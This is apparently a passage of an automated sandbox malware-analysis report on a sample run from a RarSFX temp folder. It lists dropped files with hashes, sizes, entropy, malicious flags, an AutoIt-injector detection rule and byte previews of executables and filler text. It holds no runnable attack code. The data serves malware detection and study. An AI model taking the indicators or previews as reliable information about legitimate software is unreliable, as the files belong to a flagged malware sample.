                                                                                                                                                    SHA-512:76A901A66E701C7C937AABEF2D5B4F8E488E25D89C683DA61E28B6419AAA75C322A9E5F66C9951388F876E89B485BCBC0AB2108F6FB58882205503E3FB08F4BE
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:..T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.....T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.....T.e.l.e.V.r.a.m.(.1.2.4.).:.
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):45984
                                                                                                                                                    Entropy (8bit):6.16795797263964
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                                                                                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                                                                                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                                                                                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):526
                                                                                                                                                    Entropy (8bit):5.56088650926032
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:OR8GBPduc+twADhqd2jhdyub7zKMg0JVy0:OR8GLucahPLy6/KMg10
                                                                                                                                                    MD5:56AE97A5897D70A0C7FADE5F29767A43
                                                                                                                                                    SHA1:E6ED9186AB3B3211092508F8E4FBE46E058839F7
                                                                                                                                                    SHA-256:96F922028E5673AF15F9AF520BA2F01496FEFB7D6017B82B29946D2E09351704
                                                                                                                                                    SHA-512:7CFFA2028FDF0CB5F659C644F666A426ADED46D06020FAF6DA8CF768F80960B6DB02CDFA958EE6F746466F426D7420520980E34F33A0CFA07950EDC1735016A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:619533KU8JDc44Q81610b78c31412CUd96dN3177U3E4z7O0M53180I..ColorConstants GuiDateTimePicker..8s51L174dbL235j5NAT7oKX537K9ez..ComboConstants TreeViewConstants..484LG864994b3s9u996vRGiy882YR8Ql7eb39i47865JcAN39mMN97C35oGoUQ8P2U61492LfnxY5pc1Oe0ip52D8Y0a5aI32545I4ZEVSV5QUUxKrG59848Z71G02750F0t91H82UH63Cln54fI8pX..ButtonConstants FileConstants..Z741s9vKlJ3y1W7J323l2i8IQ440cK38824714855Ne5dnyL7mo6r9zM1kl14Q880A0LR71L4jH22346ch7h67r664378E7901S9SO793k500tw3M16ZX173hZdmAgpVE60hJNnjAK0PQ356Av5X2..ToolTipConstants BorderConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.530545679464256
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:mdCqOBPbyICH8jQLa77pTdenxfGDCDL0HbBPkV4udLzH:B9CcjQu77pT410qqbOVvLzH
                                                                                                                                                    MD5:68925419289F46D376B8D0DE41A64C99
                                                                                                                                                    SHA1:9C876267E22ACB8881C7FCFC9006D97813822C95
                                                                                                                                                    SHA-256:1449B0AEFAB21761CD54949134B02FFB7042ED3FB91E36032991922199722EC7
                                                                                                                                                    SHA-512:E6E5A5498ADA1E845AD2907FE040ED69CDAC03F43702F21C8E11A666CBB4D9845AD8D6E7CFC078D2FC54B0190D261B90A580338279C94CC9B79DA4751727EDF2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:K3kBK4Brv7699pv89D87UW42M70a7tAyn..DateTimeConstants TreeViewConstants..2A0b3537B85k5mg5J3KthMc8jr7A..ToolbarConstants BorderConstants..366558cyh1ckV7NHdy2La3J35494L6oO50328EYyc86dZYG11W08PnL1d4J4PAd405x57F086cGBmgN003723k4j145283K6cd112sWH111r..ToolTipConstants ComboConstants..713RWX5R5n348I565sos8455wmqT684Gw5OABhPeCHi67u6w9R11435m000f9f34509570j0N67e..ComboConstants TreeViewConstants..43477G9032d5472K924x40y1Rxmy9jcaO1HM5p654t8X31zr60933r63y035BBP467MoM421Dg8Jv6q10U0G04X911r2O1d538D4npkbza909LF420Tj4okZd9WCM0Qj20dB9A06G028T97fJE8F9lJ..ToolTipConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):35713
                                                                                                                                                    Entropy (8bit):5.5757639550354
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:nPAvrzduvmfWP09cb22tqThZeLkujscEppQ7/UBD7sP5a:YD5uvmC09BThBlcQQda
                                                                                                                                                    MD5:F8EC3A47A92F1C45B9F6582F7CF621C1
                                                                                                                                                    SHA1:452FB70C325BA60247ECF3EB7C05C188E576CC60
                                                                                                                                                    SHA-256:771DB32E8BDD02BE6AC90F3D0902D08163C3F49CBF21F46B069BD8DA32ED0C74
                                                                                                                                                    SHA-512:DBA6D256838DCD1A30E68C35BBC5E11B51B6AA05BFECC437EF70B67B8B89A05B9865F92C90AEBC51F76832F8137EF28C4A11BDAA112519BD0419D18699937764
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:3754G5..D05169NtTJ45cn0w69855AVY75L585Yh3PD01hx7NuUWz0oOI0ONrb0V2Tn348CY6i57KXkg1c12T12ytn0..z4D028M773ydLB65HgDX9t6Ws3q23I5tX..p10995248Bhw6G2G2zn46cV4v04zjP8Yf4x4n1H1T9YWWU146QM23WxJ..h15v3732TLP700AgdCoSmv3tCvU16zhjV9Dx2opx0ZNW..22oYE8803d96e9qZXKG7fOU6ukk22C6mu..p3o37N97Q8jI40535bk5IShKy0x0Pz46z8K04417UGX5PECCex9Q7o0ZxR3xhpA58a3rnJ..v4YCI2UR5P80h237CA42Av893W6m4y63K0XF7sBrKHo5K163W0HZ7boNY1ZZ56PQ5Loy7YE8..857853y271Pn501qD4D9SM136PC198w03k4ty4N0GaeW9vk8UjZ4iE455D8..1CA6mUn75a671x0Qj7OXZy7F807569Y49b7926..113W8z91076L2o9338i82hgE5UYB6EEtD34212886gk6No9W..0T87jH6u3k5b60o1K4f994x7C1z8qfzQ14..762b033d8T68U1620b49I8cb3DHQOh5k531BU3bd65hWRO247z07SN2c75M18OG922o6i6kK3844625DW3Jsut9..DAiWrw22OkU501BXB24AR48xlvzuKpsl05Q9U464g0yDO0P96..AbBw0t4ab1J2f8qBfSC6OAMjc5UF96..0h06n144Bp55H0o2O819cwv73BUl42518O80T4kuXC7V6HL3kQY3vb..28317cjBEjGvS..T2U8MjP24244XElrq7ePm98UWhX00307N305b9AXnX4r0d9ywrC19V58880y60..M0E6J611p2VGwHTIY6x21oCf72K12486Wz0420L3357JQh..7982l3987r7XHDg6YZ8897z8451m558tu1kA1262D6448
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):579
                                                                                                                                                    Entropy (8bit):5.59314018146621
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:hKfrpxtEBNTNHmRPQdSqdAFAPN78YuuSdwZpyPh:KrmHZmRPQdaFtV4Q
                                                                                                                                                    MD5:F3372B55E755A70E9D39941A8AF77BD7
                                                                                                                                                    SHA1:164A9D56BDE91BF883F9A97D4203689C4EC13D5E
                                                                                                                                                    SHA-256:FBFD9CD1320C29A7AD37207A415D1503F686185F901299EA0870420B8A4A66AE
                                                                                                                                                    SHA-512:7CB1031AEDE051EB28BE6E72BAD4C66A5CAEA5C089BB73C2D2268F9D3DB8B1412C15383E8A68760F1AFE276B0B0A0901A4ED07A1DA1C0A04943CA5DCD7DE3CA6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:844SM564629y802766Z1XNg6MR4681P751fibf171Z581Uy65IU6SD8xsBDv7U7J2WjQ3Z74f29CcYCo240J5wT5Bz2o862s9D9qFF9E8t7h83W1ZO..GuiDateTimePicker ToolTipConstants..AN5ZfHq416b6E2XgvK1E561bB11VQ6IZ198ofDr944XP6du8fjoC4VB72LH1913Py4087574170165IO5293i..ComboConstants ButtonConstants..U356440fZ85EGkjZuv05YXE3E8VIq2qg3V80659..TreeViewConstants ComboConstants..62L06cgDIEJlL33xBk7KO1yILx3H8850E7A00z2464T802O1S73m7M678KilaCj800LR488J3pVuie39bp6558878w45Y243g4..FontConstants ColorConstants..e1k546N4K0853Imq24466jpDWLf070kzn7YuD3I1O2N17aD95802498361LK9u24lS0i..TreeViewConstants FileConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):360301
                                                                                                                                                    Entropy (8bit):4.03500126803888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:ODNuvLVuBeU1elwm4CaOYIIFdGuOqmM3iRVb1:2QT+RdiqW9
                                                                                                                                                    MD5:FAE6EE35C0F5AC2DC4885C0DE8E88032
                                                                                                                                                    SHA1:587BF6F4105D4420762C463BA33E9E3BA677E85F
                                                                                                                                                    SHA-256:4DB090B6F1CD2501C929B31C2E29D4D0A4DDF1E81BE6800E763D8C45BEA8744D
                                                                                                                                                    SHA-512:1CE62D900017DD4545023ACC3CA32DAEE7EB454A6144C99958D57E88838402013854F410B8BE1FB5D607819C48BA72FEFECC11D2C78A81408855BF3899E04B38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:0x
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):91666250
                                                                                                                                                    Entropy (8bit):7.1072697002412175
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:OVGVXVzVBV1VjVWV7VIV+VLVLVdVrVUVCVeV/VtVIVZVzVwVcVaVuVfVWVNVUVmT:sg
                                                                                                                                                    MD5:3BB3905D87F16791DDEC1379A873A8B8
                                                                                                                                                    SHA1:2289260256270F50B1681022D63F4CC4DEA68FAD
                                                                                                                                                    SHA-256:D8BB4FE637F0C382AC6E15C78BAE29CD45930C6DAE3506A02EB50ED9B5C83EE4
                                                                                                                                                    SHA-512:76FF77AF68D6AE19448D98839DEAD0057E6AA2B23DF16F575913F3A4EA0D94DD23E42A380285F36FE38DC3A9C2F672A5DD7D9F840A2A883E1755C73A04495617
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: C:\Users\user\AppData\Local\Temp\qbmt\bvqmcwxut.docx, Author: Joe Security
                                                                                                                                                    Preview:..;...9ra.........-..*.?...*j.EzC$..o.@..\..C..f..`.....=..AL.5z....(.&+.:..C".xl...|....#.c.s...6n...c..W.i-..)...h.=....:B..M.~..../..d0'.[u..I...r..l.7<...v.o...5....v.'.S.&Ab...._..f..;....d.:P...d...%.....v...`P.k....!...Yz*..$.)$.........N.t.......1.=U..(.Uu&.9..0...@.....r..Y....Cf..U...q..e...ge7.M.c...s....x...z...J_&>.+rA.T.......~.......`..'....'b.!.2.....0a.u...........W.X.........L.W.....6HI..GYU.D.....4.e.K.8.6.5.6.....0.3.y.s.J.6.R.w.e.3.3.1.7.j.1.o.w.3.g.W......@....-....wb.!Wh9o...T.S.}..{R.J..-......p._.C.usJ....{..J#.]..G]...O.6..-y...#....V...V..1...l.Q...!p..+...5.P|.t....>....F.5.5.E.7.8.F.8.6.o.e.g.2.i.P.S.2.p.6.Z.G.A.9.3.U.d.4.J.G.c.9.1.3.I.....5.i.Q.A.E.2.1.5.b.4.....9.t.7.6.y.8......A\.b!..B.:.M....d....|.-.....G*J...c.+V|\X.-..:8.....%...)..OC...X.)&K....C....^Of..5...X.L.ff....@.}..}.g...g.)T..B.0..f.B..r&F/..W..m..L....GwE...;IT.m..._U'{`..........h.m.3.C.6.8.5.5.1.y.4.h.f.2.e.0.7.4.1.u.3.j.6.8.5.1.R.j.s.8.1.K.B.a.A.
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):598
                                                                                                                                                    Entropy (8bit):5.533366767276767
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:0MtSCal0nUvrcDFBnwg6DrzX7V0tn2BPJtDRSQMcQqP1yQOM:0MgCRuwFRarzX70n2ZDRDtcy
                                                                                                                                                    MD5:42872A8299C923636DE82F9B8C4A9FD5
                                                                                                                                                    SHA1:34E35498029D6939BF99F3E67357FD8428383FB7
                                                                                                                                                    SHA-256:CB7308BEDA6F9FF1679BF8ADB0B0AB44DC160D20FABDD51A4EA47C1F3FEFE17C
                                                                                                                                                    SHA-512:8BD61EFD02DF1F69BE68A7497F590D90B08F611D9B1503EC66A2F40C31258D0B1FC2CDF10DF53A83F1CF6557F6866E9240B28382ACD16F092082A51AA84E69A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:e4Z95QXn9m2s09FiVL581Y2wgwHkDn374c9wEQhL6hcX..UpDownConstants ButtonConstants..7q6nR0o1as48202L6396U5ih32V8d1164B5xa8Ju1gE5x7LV806Dg145rs1B1Fu810dtSJ54..ComboConstants ComboConstants..3td37BgdB2c979w92Oc615o9glpwB84i05p500a24Uv6a151a892BCb41Uy4j1tr45ulNL890zQ855ls3CfpA35YtP1q126Odrjq823de7i7c0qL3f4y53W1sGu3..FontConstants TreeViewConstants..7noBP969tHo0fN67s8mcUd7G4293..StructureConstants ToolTipConstants..KaCMY02Y4p3dt50akP4YQ9Jy65v6UO62D842K01g22kr10D0I854834Ay493Sq0w1u0J9q4G254S840Y5H26B8pb0034x93l63l2R5WW0ZfB6d9kE1W725Q1K1881mX767l8M9g9r6497l106uYWJoUkJ..BorderConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):603
                                                                                                                                                    Entropy (8bit):5.577121557838347
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:Nek9yNU35QPbJ29JxdJnvi2SOxrQ3V41Nxv:QUp3OPb2dRvixOxryV4/xv
                                                                                                                                                    MD5:F9EBC2EB91660BA2F590171BE17DE8D7
                                                                                                                                                    SHA1:4C8184F056FAFC7399DD772A8FF4098BC4D35145
                                                                                                                                                    SHA-256:8E98A40279558B8377345897621D7E715614F02359FCF38C498643B103BDCC08
                                                                                                                                                    SHA-512:CFB031109D1B759ABA4FBF08497B5C9C2C2771DBAF1D11FA6DCE839A84B867605CD6D17D207833172D7432B6E67EDE6C77CFDAB5AF3BF729CF6DBEE3004F66C3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:GFXc655V5a34QTi6HI57C67hFQ9..FileConstants FontConstants..769O0c508Feg17GK7mr5w0O666esf943R7o1b35h843Lk..GuiDateTimePicker BorderConstants..ZC05H163F8KKIsTcb26d39ZRUKOXD3M1m04Yh81865485H70C148U6723Nzt1HB65ho0qpf0913yX9..FileConstants ButtonConstants..21yc725kQW0rpOrhF980T1nwe132ySnL3s478Nr1W14bKk..DateTimeConstants ComboConstants..735k04pL8Q6j6OPE8ar449OB735Yo0e8HM440s81t8r37E9m8SuSQ7x0uXA421SLcnA07m134iGd045..DateTimeConstants UpDownConstants..YY42Fz059vTUh8380y4CWTxG5G3S90138g55uj5127959z47940v0H4LLhX7HNT232CFJPF263N34ObS4F140620B83f0C23D75O31yc2p9wM47tAJVl9..BorderConstants GuiDateTimePicker..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):536
                                                                                                                                                    Entropy (8bit):5.507197250242896
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:21jD/7daULLbqRvAb7OBPkFYlgq4dtPyP:Mv3LL4vYCbd4e
                                                                                                                                                    MD5:46DCD7F3DC237B4507EB4899C1591CB3
                                                                                                                                                    SHA1:522503E702F8D76E31B2B24AF1FFB1C39B28170B
                                                                                                                                                    SHA-256:12CAC5F80BADC0292C5DED44CF86D69F016FF8A26702C48162DD8FD3FCF30189
                                                                                                                                                    SHA-512:F9967B456C70E0FCD1405A544DC79DE7AED339DDFA055FB774510DBF2BF09D0023E8E9A957B3ECC85762236DD16E751516D406A877C2CE59187D68DCE7EF6E08
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:4143930et39Yr51W0L310Yhf75pZ8Dt02cN3IBz59445p3f9F88ohaO8JK431n1N5V9A7f3M4q26h0a2Zh19u674205N20Wdu4Qplz15z9kn6qfMV0BD0AtsZa1R59G4222pDY1584io17wl9..DateTimeConstants StructureConstants..okwC3738T6o92vNGJa2N43Nl364KazQ317..ToolTipConstants FileConstants..74li60X8199q2B9L3Nj067GF04296P5H..DateTimeConstants TreeViewConstants..39Rl113Xmy8X6v469zF607FF9z9bq0159uL9Rb76WF52R3C1g7G75EQ80Wjf0U5u5F9S7eIG1..FontConstants FileConstants..J3cF7GT7z3AleNie01O89w40565oL062q0t36hK18Gl7nxt28506i7w8Xs3f0hdkS5ov5W7xa..ToolTipConstants ComboConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):591
                                                                                                                                                    Entropy (8bit):5.486133823087205
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:VG93NWupdOgiSdqI/WPXNycZO0UXLD5ojObhZKNUOd:VGZNWupdOqZ+PI0UXLCjOby
                                                                                                                                                    MD5:BCF3C4465032F6EE4C69BAA6D9BD9290
                                                                                                                                                    SHA1:826E59FB2F690D3F30C915DDF4B14DFD9C68FE55
                                                                                                                                                    SHA-256:41BDB0FAB57C8147AD9F09C4F0D898B6DD43EF1CABB26F9122552B6E948500E5
                                                                                                                                                    SHA-512:35FAC351ABCB29C2174D025A61804FED71AC9DCA43130A6156736AB47280B729DF0E2BC1B5F4D1D7272D49738B70B2012FADDD6D76D86B1242B7F70B0050649C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:iks664u5sm4836W93V6X..BorderConstants ButtonConstants..79Jh6251g1d0bgT9gX0Fo9yt10LP4FOu4h0u4W78lLBKpm2W77H3g53664h210qf4725ku8ixBT1G3ziLG027s18u9wN0iqi0U9OT9k28S1Bm12knWOg6T04..ComboConstants FontConstants..06Lr84l3YD4AqDJ1T6ksQH43c4Pv546yMHC02Pf6v40j3fg0K67UCt93D3a4Gg5V9wx420..StructureConstants FileConstants..7HxT585gOL6zI24WJd1j1S7429p7935q343OVmugw08h0254v9720P61Cc880EZ32g3U2W1Q29J83Df17899u0319H41847e96..FontConstants ColorConstants..11k8..ToolTipConstants UpDownConstants..vp15S15md55Q917ZToNc04fOb673556e40f8NW55WsGl1H57191eX0n7216MtT9sP5KiojF5..ToolTipConstants ButtonConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):504
                                                                                                                                                    Entropy (8bit):5.41211794098473
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:S6zQRTKnF8wjnSaqHsyIKNZsuNfzFwZqW6:1zCT0F8nHsbSsuNfzeZqW6
                                                                                                                                                    MD5:97A1AE97F1350D07CADF8E0A010B216A
                                                                                                                                                    SHA1:3B5555139B866AECEF0A2565AB47D7E555F7B097
                                                                                                                                                    SHA-256:951DBCBEB27D6D73D66E6EC4BA14538A7C37C5B439CB02C114E891A9DB9A34FC
                                                                                                                                                    SHA-512:B4CF9489AA0A8C1E98C0EC326CCF75D7944E982EB46BB049DA5034E1751261C987530A41485C593FE4ACEA7ABE402A3F26D1A9DB8AF89347A59CA243EDDC75BE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:L0Dre13..FontConstants ComboConstants..c4p4x0233h4Y2TlxYm..StructureConstants ButtonConstants..5BxZl05d374ytDb39mg3eb54A203rx7GD1C0Cf6..BorderConstants FileConstants..32Itu9a28E390F5C6b7W2F..ButtonConstants ColorConstants..012O84wL9916xX34Su85Q6RGZ9375082MRi2xKyQLgQ6gn4U9917a32QB44qL1Wn1O60T4w6lLmj90z5BUW62Y4SV78Yh40290..DateTimeConstants FontConstants..3816s6k67t10jhWctrKw248yK58609635IPZ56h3GL1M4iO22A0Ht4kT51ZtDVy59XP96o6yr65kZVYFma4326X7Tr3G2060K2U7p207N7Sb75bP..ToolbarConstants ButtonConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):602
                                                                                                                                                    Entropy (8bit):5.600351569577517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:OXk5vR/8cAr/X9QGeSz+s9tzuwXb21dP0zxb3evR3N:OXk5vps/X9QGers9td4dP0Nb3S3N
                                                                                                                                                    MD5:382FB868BF2C280F0A67B8055EFB9928
                                                                                                                                                    SHA1:C740CEB7A49FB1F77EC225529DF364DD133D3675
                                                                                                                                                    SHA-256:97F52EADD90E55427D8350F2E5585D9C15B8E00BA82CEA1FD09FF95445D957D7
                                                                                                                                                    SHA-512:1BB8BB9379E8ECFD3F7D90E2AA910825B91F6E29F9CC0D6AFF3266D351ACD3060497D2F8B59B4A285BB015CB893FEB4920E79EF23F7E7139011C4DCE4BC06805
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:6g9IYv05NmY8U3lIz8MbxrB554y59UHm7bjYu029BH9shFfxql01qMx1MdRPEk8079X8p443X1KE4Z7Gn2t662B02O88B9W1d1f052z247324L0I3n38k014WXci89bo1R4ItC4wXEMFXLyN0i44465p0962Hj762dghB70157Ixm2X2enVEA6482X2z..ToolbarConstants UpDownConstants..t703W7u7s6E45q43oDaU869dvR2lk4vaTX4b91C3n3G23..ToolbarConstants GuiDateTimePicker..3lV20Yn2w3F73ph435ZZB828N3mrQUn084GF1vl1hjYk14L562h69g749H3rET677a9F1390EH3L4b2wBgRVL3S938Qyyz90m5H99..BorderConstants ToolbarConstants..E525f7P1oQW97ad83kszCq4C8wzc846t221s65qR401rTe61QL9s318LC7aU1fTn914gy2o74mH627812ig6k2p8w56f4E90kS6d2344nVo4hv1ZG471i92nI8xVl..FontConstants ButtonConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):509
                                                                                                                                                    Entropy (8bit):5.43409369817081
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RGrvKNNfgOqhXsefdMGIUycy6F1SoOBPc:RiKNxgOqhXsYIUiMS7O
                                                                                                                                                    MD5:C4B81747B551CF4FCCC5C0E552252649
                                                                                                                                                    SHA1:8C6C293777A93B8752450437CBA667B05C9E23F6
                                                                                                                                                    SHA-256:B4B21FBA0D3DBA4AE00C9EB45E2E193E273547FA86B1E4C77C47A58DC80231BA
                                                                                                                                                    SHA-512:49E5DC0E9A2DFC7F729A1F8F757FA7ECDC7BBCE3C20B17DCFFC45F04A14943DA30758F55B43BD5A1270E07A8CCD848044834D05C89E65F2487117B8C810F6937
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1i65R30aDx6Am77I73j38bNATE404U27EU42Q20f1UU69BX4Ud0g59JV2071nkO81Yb2131485..ComboConstants ButtonConstants..03ZDf5Ipd29U6D53q5Bdr93u37Yv561Oxu79iD56YZnwwJA4266su9AU53H4b70w4951..BorderConstants FontConstants..53LTuB5FW08K69E3kMBuA2d42M3z87qz521x3v14..GuiDateTimePicker UpDownConstants..5X37555l42Y24uD8Id9B..StructureConstants FontConstants..3H2382nZaoX392M657Ft8Ly1147d7v8..DateTimeConstants ComboConstants..236Ka3585h02i7C54R827snLO8nR85UHxH05329u6RTbi981fP11068a9576s..DateTimeConstants TreeViewConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):648
                                                                                                                                                    Entropy (8bit):5.52835035781214
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:6FAbf+QBacUXCqJ5MclrGVcnckdeIHVpuTz9NdpvBYXDlFNX2/Oyf:6FAqQBEXCqJ28GVEckdeIHCfdpvud23f
                                                                                                                                                    MD5:FB7BC1E54A3A13C46ABEFB4B5894EAFB
                                                                                                                                                    SHA1:6E1EB3DF791408DB1CD6428582F5F057C755B3E8
                                                                                                                                                    SHA-256:1F5B7C71AD67BDFB5598D77F70CB9A7CAFC02AB47AF0140722DA2A75F21DE972
                                                                                                                                                    SHA-512:9657589C71AF1CA199E45A5B1F3A8BF225A12288D642BA476AE022C3D69CEF30D29D8C797BBA4F8FEF0EFFA8262723E289417DE394CB90C21C79231410C9ACAF
                                                                                                                                                    Malicious:false
